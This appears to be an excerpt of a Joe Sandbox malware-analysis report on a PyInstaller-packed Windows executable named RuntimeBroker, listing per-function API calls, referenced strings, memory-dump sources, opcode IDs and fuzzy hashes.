                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                • Instruction ID: e126fa8f0f020adca5bcc0ab7dfd6aee301a81cff63fbca390087eb470560944
                                                                                                                                                                                • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                • Instruction Fuzzy Hash: D1417631A1C54695EE32BB28E8985B9E360FBD4754FC00631E59D42AE4DF3CE646DF10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                • Instruction ID: a21a696c6b090491c6629d0cf89f837637f4ab48af9e5dd4ea38f3ac7b0fc683
                                                                                                                                                                                • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                • Instruction Fuzzy Hash: 15311F72609A8185EB719F64E8907FDB364FB44744F844039DA4D47BA5DF38D549CB20
                                                                                                                                                                                APIs
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B074F55
                                                                                                                                                                                  • Part of subcall function 00007FF72B0748A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748BC
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: HeapFree.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72B069BEF,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B069C19
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72B069BEF,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B069C3E
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B074F44
                                                                                                                                                                                  • Part of subcall function 00007FF72B074908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B07491C
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751BA
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751CB
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751DC
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B07541C), ref: 00007FF72B075203
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4070488512-0
                                                                                                                                                                                • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                                • Instruction ID: b8c2b5f65684857ba03b04b6275a3d6c74fc9a2e05f0d884f64d1be082add1f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                                • Instruction Fuzzy Hash: AED1A026E1864286E736BF2ADC501BDE3A1FF49B84FC48135DA0D476A6DE3CE441DB60
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                • Instruction ID: b3aaac424866fe1e4481d4fbc1dcf890b6384a01501259f7aaf1401a69bdb282
                                                                                                                                                                                • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                • Instruction Fuzzy Hash: B1315E32A18B8185DB759F29E8802BEB3A4FB88754F940135EA9D43B65DF38D146CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                • Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                                                                                                • Instruction ID: 6c269aeb70abeba5c8fdd8854abd405dc6f7c3fa2a5a475cc835093ee82fc2f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                                                                                                • Instruction Fuzzy Hash: 34B1E861B1868241EA72AB29DC049B9E350EB44BE4FC45231EE5E47BE5EF3CE441DB10
                                                                                                                                                                                APIs
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751BA
                                                                                                                                                                                  • Part of subcall function 00007FF72B074908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B07491C
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751CB
                                                                                                                                                                                  • Part of subcall function 00007FF72B0748A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748BC
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF72B0751DC
                                                                                                                                                                                  • Part of subcall function 00007FF72B0748D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0748EC
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: HeapFree.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B07541C), ref: 00007FF72B075203
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3458911817-0
                                                                                                                                                                                • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                • Instruction ID: bbcbc5e145e4a8db3abb822320ad60a974f88cd161742ec1b03db7f1d512ae5e
                                                                                                                                                                                • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                • Instruction Fuzzy Hash: 15514B22E1864286E732EF2AEC815BDE760FB49784FC44135EA4D436A6DF3CE541DB60
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0550C0
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055101
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055126
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B05514B
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055173
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B05519B
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0551C3
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B0551EB
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF72B055C57,?,00007FF72B05308E), ref: 00007FF72B055213
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                • API String ID: 190572456-2007157414
                                                                                                                                                                                • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                • Instruction ID: 66a1498f64d863b07e96b0759cf09460149afc660524153ff3ede2eb42c74d45
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B124764A0AB4391FA77FB5CACA42B8E3A0FF04751BD45435C41E126B1EF7CE548AB60
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                • API String ID: 190572456-3427451314
                                                                                                                                                                                • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                • Instruction ID: efbe7913ad2460dc7cbf451e4ce74f8dff6f659b493cfbaebe158866d6030a7e
                                                                                                                                                                                • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                • Instruction Fuzzy Hash: D6E195A4A1AB43A0EA77BB5CAC941B4E3A5FF04750FC45135C80E126B4EF3CF549AB60
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                                                                                                                                • API String ID: 2943138195-1388207849
                                                                                                                                                                                • Opcode ID: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
                                                                                                                                                                                • Instruction ID: 6808d37e393d3782a196cf300d5e946716cefd6f7f0c628a8cb40257fcd6c5ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF13B72E9861298FB14CB6CC8A42BC27B6FF15744F408635DB1D16AB8DF7DA644C348
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID: `anonymous namespace'
                                                                                                                                                                                • API String ID: 2943138195-3062148218
                                                                                                                                                                                • Opcode ID: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
                                                                                                                                                                                • Instruction ID: 3aef878cba2104739387566e83fd2e8f6cdec488269b1be3756f16fed6d805a3
                                                                                                                                                                                • Opcode Fuzzy Hash: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 03E16A72A48B8699EB20CF28E8901ED77A2FF84744F444036EB5D17B65DF38E654C704
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                • API String ID: 2030045667-1550345328
                                                                                                                                                                                • Opcode ID: 569009f7f297507fd8546658437f9c7fcb1a93c1adb78ffbe4a696c73ee9108c
                                                                                                                                                                                • Instruction ID: ad2a28cdf61541087b99246025801a567a93735240030d93452f4a7a7366fe91
                                                                                                                                                                                • Opcode Fuzzy Hash: 569009f7f297507fd8546658437f9c7fcb1a93c1adb78ffbe4a696c73ee9108c
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E518E61B0864691EA32BB1D9D901B9E3A0FF44B94FC48131DE1D47AB5EF3CE994DB20
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9
                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF72B057C97,?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B05782C
                                                                                                                                                                                  • Part of subcall function 00007FF72B0526C0: MessageBoxW.USER32 ref: 00007FF72B052736
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                • Instruction ID: c8da6068e1258ae80fbd9bff6dbba274081ee91406ed979adb3213b7776bcad5
                                                                                                                                                                                • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                • Instruction Fuzzy Hash: 10417061B2864281FA72BB2CDC916FAE251FF84784FC44435DA4E42AB5EE2CF5049F70
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2943138195-0
                                                                                                                                                                                • Opcode ID: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
                                                                                                                                                                                • Instruction ID: 7fd79ae93ea56db053e8956bc8f6437ff82328c26369c626232740f24a501fcc
                                                                                                                                                                                • Opcode Fuzzy Hash: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF16C72B48A829AEB10DF68D4A01EC37B2EF4474CB444036EB4D67BA9DF38D519D358
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
